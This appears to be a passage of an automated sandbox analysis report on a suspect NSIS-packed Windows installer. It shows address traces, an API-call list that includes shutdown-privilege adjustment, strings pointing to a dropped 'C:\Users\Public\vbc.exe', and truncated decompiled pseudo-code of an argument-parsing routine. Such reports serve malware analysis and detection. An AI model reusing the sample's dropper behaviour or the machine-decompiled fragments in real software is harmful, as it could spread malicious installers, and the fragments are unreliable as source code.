                                                                                                                                                                                                          0x004034d8
                                                                                                                                                                                                          0x004034dd
                                                                                                                                                                                                          0x004034de
                                                                                                                                                                                                          0x004034ea
                                                                                                                                                                                                          0x004034ee
                                                                                                                                                                                                          0x004034f4
                                                                                                                                                                                                          0x00403502
                                                                                                                                                                                                          0x00403507
                                                                                                                                                                                                          0x0040350e
                                                                                                                                                                                                          0x00403512
                                                                                                                                                                                                          0x00403516
                                                                                                                                                                                                          0x00403518
                                                                                                                                                                                                          0x00403518
                                                                                                                                                                                                          0x00403516
                                                                                                                                                                                                          0x00403520
                                                                                                                                                                                                          0x00403527
                                                                                                                                                                                                          0x0040352d
                                                                                                                                                                                                          0x00403543
                                                                                                                                                                                                          0x00403553
                                                                                                                                                                                                          0x00403558
                                                                                                                                                                                                          0x0040355e
                                                                                                                                                                                                          0x00403565
                                                                                                                                                                                                          0x00403571
                                                                                                                                                                                                          0x0040357b
                                                                                                                                                                                                          0x0040357d
                                                                                                                                                                                                          0x0040357f
                                                                                                                                                                                                          0x00403584
                                                                                                                                                                                                          0x00403584
                                                                                                                                                                                                          0x00403594
                                                                                                                                                                                                          0x0040359a
                                                                                                                                                                                                          0x00403663
                                                                                                                                                                                                          0x00403663
                                                                                                                                                                                                          0x00403665
                                                                                                                                                                                                          0x00403667
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035a3
                                                                                                                                                                                                          0x004035a6
                                                                                                                                                                                                          0x004035ae
                                                                                                                                                                                                          0x004035ae
                                                                                                                                                                                                          0x004035b1
                                                                                                                                                                                                          0x004035b6
                                                                                                                                                                                                          0x004035b8
                                                                                                                                                                                                          0x004035b8
                                                                                                                                                                                                          0x004035b9
                                                                                                                                                                                                          0x004035b9
                                                                                                                                                                                                          0x004035be
                                                                                                                                                                                                          0x004035c1
                                                                                                                                                                                                          0x00403653
                                                                                                                                                                                                          0x00403658
                                                                                                                                                                                                          0x0040365d
                                                                                                                                                                                                          0x00403660
                                                                                                                                                                                                          0x00403662
                                                                                                                                                                                                          0x00403662
                                                                                                                                                                                                          0x00403662
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035c7
                                                                                                                                                                                                          0x004035c7
                                                                                                                                                                                                          0x004035c8
                                                                                                                                                                                                          0x004035cb
                                                                                                                                                                                                          0x004035e3
                                                                                                                                                                                                          0x0040360e
                                                                                                                                                                                                          0x00403610
                                                                                                                                                                                                          0x00403623
                                                                                                                                                                                                          0x0040364e
                                                                                                                                                                                                          0x00403651
                                                                                                                                                                                                          0x0040366f
                                                                                                                                                                                                          0x00403672
                                                                                                                                                                                                          0x0040367b
                                                                                                                                                                                                          0x00403680
                                                                                                                                                                                                          0x00403686
                                                                                                                                                                                                          0x00403691
                                                                                                                                                                                                          0x00403693
                                                                                                                                                                                                          0x00403698
                                                                                                                                                                                                          0x0040369a
                                                                                                                                                                                                          0x004036f2
                                                                                                                                                                                                          0x004036f7
                                                                                                                                                                                                          0x00403701
                                                                                                                                                                                                          0x00403708
                                                                                                                                                                                                          0x0040370c
                                                                                                                                                                                                          0x004037a0
                                                                                                                                                                                                          0x004037a0
                                                                                                                                                                                                          0x004037a5
                                                                                                                                                                                                          0x004037ab
                                                                                                                                                                                                          0x004037b0
                                                                                                                                                                                                          0x004038d4
                                                                                                                                                                                                          0x004038da
                                                                                                                                                                                                          0x00403956
                                                                                                                                                                                                          0x00403956
                                                                                                                                                                                                          0x0040395b
                                                                                                                                                                                                          0x0040395e
                                                                                                                                                                                                          0x00403960
                                                                                                                                                                                                          0x00403960
                                                                                                                                                                                                          0x00403968
                                                                                                                                                                                                          0x00403968
                                                                                                                                                                                                          0x004038ea
                                                                                                                                                                                                          0x004038f2
                                                                                                                                                                                                          0x004038f4
                                                                                                                                                                                                          0x004038f5
                                                                                                                                                                                                          0x00403902
                                                                                                                                                                                                          0x00403915
                                                                                                                                                                                                          0x0040391d
                                                                                                                                                                                                          0x00403921
                                                                                                                                                                                                          0x00403921
                                                                                                                                                                                                          0x00403929
                                                                                                                                                                                                          0x0040392e
                                                                                                                                                                                                          0x00403935
                                                                                                                                                                                                          0x00403943
                                                                                                                                                                                                          0x00403945
                                                                                                                                                                                                          0x0040394b
                                                                                                                                                                                                          0x0040394d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403937
                                                                                                                                                                                                          0x0040393d
                                                                                                                                                                                                          0x0040393f
                                                                                                                                                                                                          0x00403941
                                                                                                                                                                                                          0x0040394f
                                                                                                                                                                                                          0x00403951
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403951
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403941
                                                                                                                                                                                                          0x00403935
                                                                                                                                                                                                          0x004037bf
                                                                                                                                                                                                          0x004037c6
                                                                                                                                                                                                          0x004037c6
                                                                                                                                                                                                          0x00403718
                                                                                                                                                                                                          0x00403790
                                                                                                                                                                                                          0x00403790
                                                                                                                                                                                                          0x0040379c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040379c
                                                                                                                                                                                                          0x00403721
                                                                                                                                                                                                          0x00403725
                                                                                                                                                                                                          0x0040375b
                                                                                                                                                                                                          0x0040375b
                                                                                                                                                                                                          0x0040375d
                                                                                                                                                                                                          0x00403765
                                                                                                                                                                                                          0x004037d7
                                                                                                                                                                                                          0x004037d9
                                                                                                                                                                                                          0x004037e0
                                                                                                                                                                                                          0x004037e8
                                                                                                                                                                                                          0x004037e8
                                                                                                                                                                                                          0x004037f3
                                                                                                                                                                                                          0x004037f8
                                                                                                                                                                                                          0x00403807
                                                                                                                                                                                                          0x0040380b
                                                                                                                                                                                                          0x0040380c
                                                                                                                                                                                                          0x00403815
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040381b
                                                                                                                                                                                                          0x00403821
                                                                                                                                                                                                          0x00403827
                                                                                                                                                                                                          0x0040382f
                                                                                                                                                                                                          0x0040382f
                                                                                                                                                                                                          0x0040383d
                                                                                                                                                                                                          0x00403842
                                                                                                                                                                                                          0x00403854
                                                                                                                                                                                                          0x0040385c
                                                                                                                                                                                                          0x00403862
                                                                                                                                                                                                          0x0040386e
                                                                                                                                                                                                          0x00403874
                                                                                                                                                                                                          0x0040387e
                                                                                                                                                                                                          0x00403894
                                                                                                                                                                                                          0x004038a5
                                                                                                                                                                                                          0x004038ab
                                                                                                                                                                                                          0x004038b2
                                                                                                                                                                                                          0x004038b5
                                                                                                                                                                                                          0x004038bb
                                                                                                                                                                                                          0x004038bb
                                                                                                                                                                                                          0x004038b2
                                                                                                                                                                                                          0x004038bf
                                                                                                                                                                                                          0x004038c5
                                                                                                                                                                                                          0x004038c5
                                                                                                                                                                                                          0x004038ca
                                                                                                                                                                                                          0x004038ca
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403807
                                                                                                                                                                                                          0x00403767
                                                                                                                                                                                                          0x00403769
                                                                                                                                                                                                          0x00403774
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040377c
                                                                                                                                                                                                          0x00403787
                                                                                                                                                                                                          0x0040378c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040378c
                                                                                                                                                                                                          0x00403750
                                                                                                                                                                                                          0x00403752
                                                                                                                                                                                                          0x00403756
                                                                                                                                                                                                          0x00403759
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403759
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403752
                                                                                                                                                                                                          0x004036a2
                                                                                                                                                                                                          0x004036ae
                                                                                                                                                                                                          0x004036b3
                                                                                                                                                                                                          0x004036b8
                                                                                                                                                                                                          0x004036ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004036c2
                                                                                                                                                                                                          0x004036ca
                                                                                                                                                                                                          0x004036db
                                                                                                                                                                                                          0x004036e3
                                                                                                                                                                                                          0x004036e5
                                                                                                                                                                                                          0x004036ea
                                                                                                                                                                                                          0x004036ec
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004036ec
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403651
                                                                                                                                                                                                          0x00403612
                                                                                                                                                                                                          0x00403615
                                                                                                                                                                                                          0x00403618
                                                                                                                                                                                                          0x0040361e
                                                                                                                                                                                                          0x0040361e
                                                                                                                                                                                                          0x0040361e
                                                                                                                                                                                                          0x0040361e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040361e
                                                                                                                                                                                                          0x0040361a
                                                                                                                                                                                                          0x0040361c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040361c
                                                                                                                                                                                                          0x004035cd
                                                                                                                                                                                                          0x004035d0
                                                                                                                                                                                                          0x004035d3
                                                                                                                                                                                                          0x004035d9
                                                                                                                                                                                                          0x004035d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035d9
                                                                                                                                                                                                          0x004035d5
                                                                                                                                                                                                          0x004035d7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035d7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035a8
                                                                                                                                                                                                          0x004035a8
                                                                                                                                                                                                          0x004035a8
                                                                                                                                                                                                          0x004035a9
                                                                                                                                                                                                          0x004035a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004035a8
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004034B1
                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                                                                                                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00403594
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403691
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004036C2
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                            • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754), ref: 00403B50
                                                                                                                                                                                                            • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                                                                                                            • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                                                                                                            • Part of subcall function 00403A60: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403BB7
                                                                                                                                                                                                            • Part of subcall function 00403A60: RegisterClassA.USER32(0042EBE0), ref: 00403BF4
                                                                                                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(00000184), ref: 00403980
                                                                                                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(00000188), ref: 00403994
                                                                                                                                                                                                          • OleUninitialize.OLE32 ref: 004037A5
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037C6
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403968
                                                                                                                                                                                                            • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                                                                                          • String ID: "$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                          • API String ID: 538718688-3654181138
                                                                                                                                                                                                          • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                                                                                                          • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E31A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E72E31A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E72E31215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E72E31215();
				_t320 = E72E3123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E72E312FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E72E31534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x72e32259) & 0x000000ff) * 4 +  &M72E321CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E72E31224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E72E31215();
											 &_v12 = E72E31A36( &_v12);
											__eax = E72E31429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E72E31A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E72E31A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x72e3305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E72E31A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
